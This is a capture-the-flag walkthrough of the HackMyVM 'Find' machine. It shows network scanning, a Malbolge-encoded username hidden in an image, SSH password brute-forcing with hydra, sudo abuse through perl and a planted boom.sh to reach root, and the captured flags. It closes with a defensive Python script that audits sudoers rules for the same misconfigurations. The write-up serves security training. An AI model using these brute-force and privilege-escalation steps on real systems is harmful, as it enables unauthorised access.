
HackMyVM-Find

Information gathering

Host discovery

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:39:60:4c, IPv4: 192.168.43.126
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.43.1    c6:45:66:05:91:88       (Unknown: locally administered)
192.168.43.137  08:00:27:d0:6b:60       PCS Systemtechnik GmbH
192.168.43.197  04:6c:59:bd:33:50       Intel Corporate
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.955 seconds (130.95 hosts/sec). 3 responded

Port scanning

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.43.137
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-28 05:14 EDT
Nmap scan report for find (192.168.43.137)
Host is up (0.000085s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:D0:6B:60 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.95 seconds

┌──(root㉿kali)-[~]
└─# nmap -sT -sV -O -p22,80 192.168.43.137
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-28 05:17 EDT
Nmap scan report for find (192.168.43.137)
Host is up (0.00023s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:D0:6B:60 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds

Exploitation

Let's see what is being served on port 80.

[image]

Directory enumeration

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.43.137 -w /home/kali/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.43.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/kali/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              git,html,php,txt,jpg,png,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/cat.jpg              (Status: 200) [Size: 35137]
/manual               (Status: 301) [Size: 317] [--> http://192.168.43.137/manual/]
/robots.txt           (Status: 200) [Size: 13]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 279]
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================

/robots.txt

[image]

/cat.jpg: after downloading the image, I found a strange-looking string inside it.

>C<;_"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJ`_dcba`_^]\Uy<XW
VOsrRKPONGk.-,+*)('&%$#"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONML
KJIHGFEDZY^W\[ZYXWPOsSRQPON0Fj-IHAeR

From another writeup I learned that this is the Malbolge programming language, so I used https://malbolge.doleczek.pl/ to see what it outputs.

[image]

This should be the username, so let's brute-force SSH with it.

┌──(kali㉿kali)-[~]
└─$ hydra -l missyred -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.43.137
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-28 10:56:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.43.137:22/
[22][ssh] host: 192.168.43.137   login: missyred   password: iloveyou
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-28 10:56:14

Privilege escalation

Look for anything that can be used to escalate privileges.

missyred@find:~$ sudo -l
[sudo] password for missyred:
Matching Defaults entries for missyred on find:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User missyred may run the following commands on find:
    (kings) /usr/bin/perl
missyred@find:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
missyred:x:1001:1001::/home/missyred:/bin/bash
kings:x:1002:1006::/home/kings:/bin/bash

[image]

Successfully escalated to kings.

missyred@find:~$ sudo -u kings /usr/bin/perl -e ' exec "/bin/sh";'
$ id
uid=1002(kings) gid=1006(kings) groups=1006(kings),1005(kingg)

user.txt

$ cat user.txt
f4e690f638c01bd8a19fb1349d40519c

Look for a way to escalate further.

$ sudo -l
Matching Defaults entries for kings on find:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kings may run the following commands on find:
    (ALL) NOPASSWD: /opt/boom/boom.sh

Privilege escalation to root

kings@find:~$ cd /opt
kings@find:/opt$ ls
kings@find:/opt$
kings@find:/opt$ mkdir /opt/boom
kings@find:/opt$ cd /opt/boom
kings@find:/opt/boom$ echo "/bin/bash" > /opt/boom/boom.sh
kings@find:/opt/boom$ chmod +x /opt/boom/boom.sh
kings@find:/opt/boom$ sudo /opt/boom/boom.sh
root@find:/opt/boom# id
uid=0(root) gid=0(root) groups=0(root)
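Both sudo rules on this box are textbook misconfigurations: an interpreter (perl) runnable as another user, and a NOPASSWD rule pointing at a script that does not exist under a directory the user can write to. The following audit script is an added example (not part of the original writeup or the box) that parses simplified sudoers-style lines and flags exactly those two patterns; the rule lines and the simulated filesystem state are constructed to mirror what the writeup shows, and the real-filesystem checks are only defaults.

```python
import os
import re
import stat
# Interpreters/editors that can spawn a shell when run through sudo (constructed, partial list).
SHELL_CAPABLE = {"perl", "python", "python3", "ruby", "awk", "find", "vi", "vim", "less", "bash", "sh"}
# Simplified sudoers line:  user host = (runas) [TAG:]... cmd[, cmd...]
RULE_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?((?:[A-Z]+:\s*)*)(.+)$")

def parse_rule(line):
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    user, host, runas, tags, cmds = m.groups()
    return {"user": user, "host": host, "runas": runas or user,
            "nopasswd": "NOPASSWD:" in tags,
            "commands": [c.strip() for c in cmds.split(",")]}

def writable_by_nonroot(path):
    # Real-filesystem default: owner is not root, or group/other hold the write bit.
    st = os.stat(path)
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_rule(rule, exists, writable):
    findings = []
    for cmd in rule["commands"]:
        path = cmd.split()[0]  # ignore arguments; the binary is what matters here
        if os.path.basename(path) in SHELL_CAPABLE:
            findings.append(f"{path}: interpreter run as {rule['runas']} can exec a shell")
        if not exists(path):
            parent = os.path.dirname(path)  # nearest existing ancestor decides who can create it
            while parent not in ("", "/") and not exists(parent):
                parent = os.path.dirname(parent)
            who = f"{parent} is writable; caller can plant it" if writable(parent) else "dead rule"
            findings.append(f"{path}: missing, {who}")
        elif writable(path):
            findings.append(f"{path}: existing target is writable by non-root")
    if rule["nopasswd"] and findings:
        findings.append("NOPASSWD: the above needs no password to abuse")
    return findings

def audit_lines(lines, exists=os.path.exists, writable=writable_by_nonroot):
    """Map each rule's user to findings; exists/writable are injectable for offline runs."""
    report = {}
    for rule in filter(None, map(parse_rule, lines)):
        report.setdefault(rule["user"], []).extend(audit_rule(rule, exists, writable))
    return report

# Constructed sample mirroring the two sudo rules seen on the Find box.
FIND_RULES = ["missyred find = (kings) /usr/bin/perl", "kings ALL = (ALL) NOPASSWD: /opt/boom/boom.sh"]
```

Running `audit_lines(FIND_RULES)` on a real host uses the live filesystem; the fix on the box side is to remove the perl rule and make sure /opt/boom/boom.sh exists, is root-owned, and sits in a root-owned, non-writable directory.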

root.txt

root@find:~# cat root.txt
c8aaf0f3189e000006c305bbfcbeb790